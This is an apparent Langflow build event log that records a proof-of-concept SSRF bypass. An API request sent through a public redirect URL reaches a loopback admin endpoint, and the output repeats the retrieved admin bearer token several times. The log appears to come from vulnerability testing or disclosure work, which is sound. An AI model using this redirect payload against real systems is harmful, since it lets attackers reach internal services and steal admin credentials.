{"event": "vertices_sorted", "data": {"ids": ["APIRequest-b482ac52"], "to_run": ["APIRequest-b482ac52"]}}

{"event": "build_start", "data": {}}

{"event": "log", "data": {"name": "Log 1", "message": "Security Warning: HTTP redirects are enabled. This may allow SSRF bypass attacks where a public URL redirects to internal resources (e.g., cloud metadata endpoints). Only enable this if you trust the target server.", "type": "text", "output": "data", "component_id": "APIRequest-b482ac52"}}

{"event": "log", "data": {"name": "Log 2", "message": "SSRF Protection: Using DNS pinning with 2 validated IP(s)", "type": "text", "output": "data", "component_id": "APIRequest-b482ac52"}}

{"event": "end_vertex", "data": {"build_data": {"id": "APIRequest-b482ac52", "inactivated_vertices": [], "next_vertices_ids": [], "top_level_vertices": [], "valid": true, "params": "None", "data": {"results": {}, "outputs": {"data": {"message": {"source": "https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token", "status_code": 200, "response_headers": {"server": "BaseHTTP/0.6 Python/3.14.4", "date": "Sun, 05 Jul 2026 09:39:31 GMT", "content-type": "application/json", "content-length": "533"}, "redirection_history": [{"url": "http://127.0.0.1:9999/admin-token", "status_code": 302}], "result": {"service": "internal-admin", "endpoint": "/admin-token", "secret": "INTERNAL_ADMIN_TOKEN_CVE_2026_10129", "credential_type": "langflow_admin_bearer_token", "access_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxNzF9.96noAiNE1l6qEm-JeKIOW04EnoyyxP0fOlYaXvi0D0U", "token_subject": "7f890ffbf36d4d3ab08bf042915f1d69", "token_username": "admin", "note": "loopback-only admin metadata; SSRF protection should block access to this credential"}, "headers": {"User-Agent": "Langflow/1.0"}}, "type": "object"}}, "logs": {"data": [{"name": "Log 1", "message": "Security Warning: HTTP redirects are enabled. This may allow SSRF bypass attacks where a public URL redirects to internal resources (e.g., cloud metadata endpoints). Only enable this if you trust the target server.", "type": "text"}, {"name": "Log 2", "message": "SSRF Protection: Using DNS pinning with 2 validated IP(s)", "type": "text"}], "component_as_tool": []}, "message": {"data": {"repr": "{\n    \"source\": \"https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token\",\n    \"status_code\": 200,\n    \"response_headers\": {\n        \"server\": \"BaseHTTP/0.6 Python/3.14.4\",\n        \"date\": \"Sun, 05 Jul 2026 09:39:31 GMT\",\n        \"content-type\": \"application/json\",\n        \"content-length\": \"533\"\n    },\n    \"redirection_history\": [\n        {\n            \"url\": \"http://127.0.0.1:9999/admin-token\",\n            \"status_code\": 302\n        }\n    ],\n    \"result\": {\n        \"service\": \"internal-admin\",\n        \"endpoint\": \"/admin-token\",\n        \"secret\": \"INTERNAL_ADMIN_TOKEN_CVE_2026_10129\",\n        \"credential_type\": \"langflow_admin_bearer_token\",\n        \"access_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxNzF9.96noAiNE1l6qEm-JeKIOW04EnoyyxP0fOlYaXvi0D0U\",\n        \"token_subject\": \"7f890ffbf36d4d3ab08bf042915f1d69\",\n        \"token_username\": \"admin\",\n        \"note\": \"loopback-only admin metadata; SSRF protection should block access to this credential\"\n    },\n    \"headers\": {\n        \"User-Agent\": \"Langflow/1.0\"\n    }\n}", "raw": {"source": "https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token", "status_code": 200, "response_headers": {"server": "BaseHTTP/0.6 Python/3.14.4", "date": "Sun, 05 Jul 2026 09:39:31 GMT", "content-type": "application/json", "content-length": "533"}, "redirection_history": [{"url": "http://127.0.0.1:9999/admin-token", "status_code": 302}], "result": {"service": "internal-admin", "endpoint": "/admin-token", "secret": "INTERNAL_ADMIN_TOKEN_CVE_2026_10129", "credential_type": "langflow_admin_bearer_token", "access_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxNzF9.96noAiNE1l6qEm-JeKIOW04EnoyyxP0fOlYaXvi0D0U", "token_subject": "7f890ffbf36d4d3ab08bf042915f1d69", "token_username": "admin", "note": "loopback-only admin metadata; SSRF protection should block access to this credential"}, "headers": {"User-Agent": "Langflow/1.0"}}, "type": "object"}, "component_as_tool": {"repr": "{\n    \"source\": \"https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token\",\n    \"status_code\": 200,\n    \"response_headers\": {\n        \"server\": \"BaseHTTP/0.6 Python/3.14.4\",\n        \"date\": \"Sun, 05 Jul 2026 09:39:31 GMT\",\n        \"content-type\": \"application/json\",\n        \"content-length\": \"533\"\n    },\n    \"redirection_history\": [\n        {\n            \"url\": \"http://127.0.0.1:9999/admin-token\",\n            \"status_code\": 302\n        }\n    ],\n    \"result\": {\n        \"service\": \"internal-admin\",\n        \"endpoint\": \"/admin-token\",\n        \"secret\": \"INTERNAL_ADMIN_TOKEN_CVE_2026_10129\",\n        \"credential_type\": \"langflow_admin_bearer_token\",\n        \"access_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxNzF9.96noAiNE1l6qEm-JeKIOW04EnoyyxP0fOlYaXvi0D0U\",\n        \"token_subject\": \"7f890ffbf36d4d3ab08bf042915f1d69\",\n        \"token_username\": \"admin\",\n        \"note\": \"loopback-only admin metadata; SSRF protection should block access to this credential\"\n    },\n    \"headers\": {\n        \"User-Agent\": \"Langflow/1.0\"\n    }\n}", "raw": {"text_key": "text", "data": {"source": "https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token", "status_code": 200, "response_headers": {"server": "BaseHTTP/0.6 Python/3.14.4", "date": "Sun, 05 Jul 2026 09:39:31 GMT", "content-type": "application/json", "content-length": "533"}, "redirection_history": [{"url": "http://127.0.0.1:9999/admin-token", "status_code": 302}], "result": {"service": "internal-admin", "endpoint": "/admin-token", "secret": "INTERNAL_ADMIN_TOKEN_CVE_2026_10129", "credential_type": "langflow_admin_bearer_token", "access_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxNzF9.96noAiNE1l6qEm-JeKIOW04EnoyyxP0fOlYaXvi0D0U", "token_subject": "7f890ffbf36d4d3ab08bf042915f1d69", "token_username": "admin", "note": "loopback-only admin metadata; SSRF protection should block access to this credential"}, "headers": {"User-Agent": "Langflow/1.0"}}, "default_value": ""}, "type": "object"}}, "artifacts": {"data": {"repr": "{\n    \"source\": \"https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token\",\n    \"status_code\": 200,\n    \"response_headers\": {\n        \"server\": \"BaseHTTP/0.6 Python/3.14.4\",\n        \"date\": \"Sun, 05 Jul 2026 09:39:31 GMT\",\n        \"content-type\": \"application/json\",\n        \"content-length\": \"533\"\n    },\n    \"redirection_history\": [\n        {\n            \"url\": \"http://127.0.0.1:9999/admin-token\",\n            \"status_code\": 302\n        }\n    ],\n    \"result\": {\n        \"service\": \"internal-admin\",\n        \"endpoint\": \"/admin-token\",\n        \"secret\": \"INTERNAL_ADMIN_TOKEN_CVE_2026_10129\",\n        \"credential_type\": \"langflow_admin_bearer_token\",\n        \"access_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxNzF9.96noAiNE1l6qEm-JeKIOW04EnoyyxP0fOlYaXvi0D0U\",\n        \"token_subject\": \"7f890ffbf36d4d3ab08bf042915f1d69\",\n        \"token_username\": \"admin\",\n        \"note\": \"loopback-only admin metadata; SSRF protection should block access to this credential\"\n    },\n    \"headers\": {\n        \"User-Agent\": \"Langflow/1.0\"\n    }\n}", "raw": {"source": "https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token", "status_code": 200, "response_headers": {"server": "BaseHTTP/0.6 Python/3.14.4", "date": "Sun, 05 Jul 2026 09:39:31 GMT", "content-type": "application/json", "content-length": "533"}, "redirection_history": [{"url": "http://127.0.0.1:9999/admin-token", "status_code": 302}], "result": {"service": "internal-admin", "endpoint": "/admin-token", "secret": "INTERNAL_ADMIN_TOKEN_CVE_2026_10129", "credential_type": "langflow_admin_bearer_token", "access_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxNzF9.96noAiNE1l6qEm-JeKIOW04EnoyyxP0fOlYaXvi0D0U", "token_subject": "7f890ffbf36d4d3ab08bf042915f1d69", "token_username": "admin", "note": "loopback-only admin metadata; SSRF protection should block access to this credential"}, "headers": {"User-Agent": "Langflow/1.0"}}, "type": "object"}, "component_as_tool": {"repr": "{\n    \"source\": \"https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token\",\n    \"status_code\": 200,\n    \"response_headers\": {\n        \"server\": \"BaseHTTP/0.6 Python/3.14.4\",\n        \"date\": \"Sun, 05 Jul 2026 09:39:31 GMT\",\n        \"content-type\": \"application/json\",\n        \"content-length\": \"533\"\n    },\n    \"redirection_history\": [\n        {\n            \"url\": \"http://127.0.0.1:9999/admin-token\",\n            \"status_code\": 302\n        }\n    ],\n    \"result\": {\n        \"service\": \"internal-admin\",\n        \"endpoint\": \"/admin-token\",\n        \"secret\": \"INTERNAL_ADMIN_TOKEN_CVE_2026_10129\",\n        \"credential_type\": \"langflow_admin_bearer_token\",\n        \"access_token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxNzF9.96noAiNE1l6qEm-JeKIOW04EnoyyxP0fOlYaXvi0D0U\",\n        \"token_subject\": \"7f890ffbf36d4d3ab08bf042915f1d69\",\n        \"token_username\": \"admin\",\n        \"note\": \"loopback-only admin metadata; SSRF protection should block access to this credential\"\n    },\n    \"headers\": {\n        \"User-Agent\": \"Langflow/1.0\"\n    }\n}", "raw": {"text_key": "text", "data": {"source": "https://postman-echo.com/redirect-to?url=http%3A%2F%2F127.0.0.1%3A9999%2Fadmin-token", "status_code": 200, "response_headers": {"server": "BaseHTTP/0.6 Python/3.14.4", "date": "Sun, 05 Jul 2026 09:39:31 GMT", "content-type": "application/json", "content-length": "533"}, "redirection_history": [{"url": "http://127.0.0.1:9999/admin-token", "status_code": 302}], "result": {"service": "internal-admin", "endpoint": "/admin-token", "secret": "INTERNAL_ADMIN_TOKEN_CVE_2026_10129", "credential_type": "langflow_admin_bearer_token", "access_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI3Zjg5MGZmYmYzNmQ0ZDNhYjA4YmYwNDI5MTVmMWQ2OSIsInR5cGUiOiJhY2Nlc3MiLCJleHAiOjE3ODMyNDYxNzF9.96noAiNE1l6qEm-JeKIOW04EnoyyxP0fOlYaXvi0D0U", "token_subject": "7f890ffbf36d4d3ab08bf042915f1d69", "token_username": "admin", "note": "loopback-only admin metadata; SSRF protection should block access to this credential"}, "headers": {"User-Agent": "Langflow/1.0"}}, "default_value": ""}, "type": "object"}}, "timedelta": 0.21553258399944752, "duration": "216 ms", "used_frozen_result": false, "token_usage": null}, "timestamp": "2026-07-05T09:39:31.742126Z"}}}

{"event": "end", "data": {"build_duration": 0.21553258399944752}}

